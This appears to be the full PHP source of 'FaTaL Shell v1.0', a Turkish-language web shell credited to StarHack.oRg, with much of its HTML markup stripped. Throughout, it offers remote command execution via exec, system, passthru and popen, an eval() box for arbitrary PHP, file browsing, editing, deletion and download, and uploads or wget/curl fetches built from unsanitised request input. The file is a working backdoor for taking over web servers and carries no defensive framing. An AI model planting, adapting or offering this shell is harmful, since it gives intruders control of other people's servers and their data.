$v){$_POST[$k] = stripslashes($v);}} @ini_set('max_execution_time',0); (@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF(Rootla_Beni:)"); (@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0); (strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0); $version='version 1.0 by FaTaLErrOr'; $action=$_POST['action']; $file=$_POST['file']; $dir=$_POST['dir']; $content=''; $stdata=''; $style=''; $header=''.getenv("HTTP_HOST").' - FaTaL Shell v1.0'.$style.''; $footer=''; $lang=array( 'filext'=>'Lutfen Dosyayi Adlandiriniz Yada Degistiriniz.', 'uploadok'=>'Baþarýyla Yüklendi.', 'dircrt'=>'Klasör Oluþturuldu.', 'dontlist'=>'Listelenemiyor Ýzin Yok.', 'dircrterr'=>'Oluþturulamýyor Ýzin Yok.', 'dirnf'=>'Dizin Bulunamadi.', 'filenf'=>'.', 'dontwrdir'=>'Sadece Okunabilir.', 'empty'=>'Dizin Boþ Deðil Yada Ýzin Yok.', 'deletefileok'=>'Dosya Silindi.', 'deletedirok'=>'Klasör Silindi.', 'isdontfile'=>'Lütfen Full Url Yazýn. c:/program files/a.php Gibi', 'cantrfile'=>'Dosya Açýlamýyor izin Yok.', 'onlyracc'=>'Dosya Editlenemiyor Okuma Ýzni Var Sadece..', 'workdir'=>'Çalýþma Dizini: ', 'fullacc'=>'Full Yetki.', 'fullaccdir'=>'Full Yetkiniz Var Dosya Silip Düzenleyebilirsiniz.', 'thisnodir'=>'Klasör Seçin.', 'allfuncsh'=>'Fonksiyoýnlar Kapalý.' ); $act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir');//here added new actions function test_file($file){ if(!file_exists($file))$err="1"; elseif(!is_file($file)) $err="2"; elseif(!is_readable($file))$err="3"; elseif(!is_writable($file))$err="4"; else $err="5"; return $err;} function test_dir($dir){ if(!file_exists($dir))$err="1"; elseif(!is_dir($dir)) $err="2"; elseif(!is_readable($dir))$err="3"; elseif(!is_writable($dir))$err="4"; else $err="5"; return $err;} function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-')); return $info;} function view_size($size){ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size;} if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer"; if(isset($dir)){ $ts['test']=test_dir($dir); switch($ts['test']){ case 1:$stdata.=$lang['dirnf'];break; case 2:$stdata.=$lang['thisnodir'];break; case 3:$stdata.=$lang['dontlist'];break; case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break; case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;} }else $dir=@chdir($dir); $dir=getcwd()."/"; $dir=str_replace("\\","/",$dir); if(isset($file)){ $ts['test1']=test_file($file); switch ($ts['test1']){ case 1:$stdata.=$lang['filenf'];break; case 2:$stdata.=$lang['isdontfile'];break; case 3:$stdata.=$lang['cantrfile'];break; case 4:$stdata.=$lang['onlyracc'];$file=$file;break; case 5:$stdata.=$lang['fullacc'];$file=$file;break;} } function shell($cmd) { global $lang; $ret = ''; if (!empty($cmd)) { if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);} elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);} elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();} elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();} elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);} else $ret=$lang['allfuncsh']; } return $ret; } function createdir($dir){mkdir($dir);} //delete file if($action=="delete"){ if(unlink($file)) $content.=$lang['deletefileok']." AnaSayfaya Dönemk Ýçin Týklayýnýz."; } //delete dir if($action=="deletedir"){ if(!rmdir($file)) $content.=$lang['empty']." AnaSayfaya Dönemk Ýçin Týklayýnýz."; else $content.=$lang['deletedirok']." AnaSayfaya Dönemk Ýçin Týklayýnýz."; } //shell if($action=="shell"){ $content.="


";} //editor if($action=="editor"){ $stdata.="
Dosyanýn Adý (Full Url Yazýn)
"; function writef($file,$data){ $fp = fopen($file,"w+"); fwrite($fp,$data); fclose($fp); } function readf($file){ clearstatcache(); $f=fopen($file, "r"); $contents = fread($f,filesize($file)); fclose($f); return htmlspecialchars($contents); } if(@$_POST['save'])writef($file,$_POST['data']); if(@$_POST['create'])writef($file,""); $test=test_file($file); if($test==1){ $content.="
File name:
"; } if($test>2){ $content.="

"; }} //viewer if($action=="viewer"){ $content.=""; $content.=""; if (is_dir($dir)) { if (@$dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { if(filetype($dir . $file)=="dir") $dire[]=$file; if(filetype($dir . $file)=="file")$files[]=$file; } closedir($dh); @sort($dire); @sort($files); if ($GLOBALS['os']==1) { $content.=""; } $content.=""; for($i=0;$i'.$dire[$i].''; } for($i=0;$i'.$files[$i].'
'; } $content.="
Klasore Git:
HDD Secin:"; for ($j=ord('C'); $j<=ord('Z'); $j++) if (@$dh = opendir(chr($j).":/")) $content.=' '.chr($j).''; $content.="
Sistem: ".@php_uname()."
BiçimBoyutizinSeçenekler
Klasor'.perms($link).'X
Dosya'.view_size(filesize($linkfile)).''.perms($linkfile).'DEX
"; }}} //downloader if($action=="download"){ header('Content-Length:'.filesize($file).''); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.$file.'"'); readfile($file);} //phpeval if($action=="phpeval"){ $content.="
<?php

?>
"; if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);} //upload if($action=="upload"){ if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir; $form_win="
Buraya Uploadla:Dosyayý Adlandýr (Gerekli) :"; if($os==1)$content.=$form_win; if($os==0){ $content.=$form_win; $content.='File addres:
'; } if(isset($_POST['uploadloc'])){ if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else $uploadfile = $dirupload."/".$_POST['filename']; if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);} if(file_exists($uploadfile))$content.=$lang['filext']; elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) $content.=$lang['uploadok']; } if(isset($_POST['upload'])){ if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename'])) switch($_POST['with']) { case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break; case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break; case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break; case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break; case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break; case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break; }}} //end function ?>

FaTaLSheLL v1.0

| Shell | Ana Sayfa| Dosya Editle| Dosya Upload| Php Eval | <-Geri | Ýleri->|

 

Safe mode:
Fonksiyon Kýsýtlamasý:
Sistem:
Durum:
COPYRIGHT BY StarHack.oRg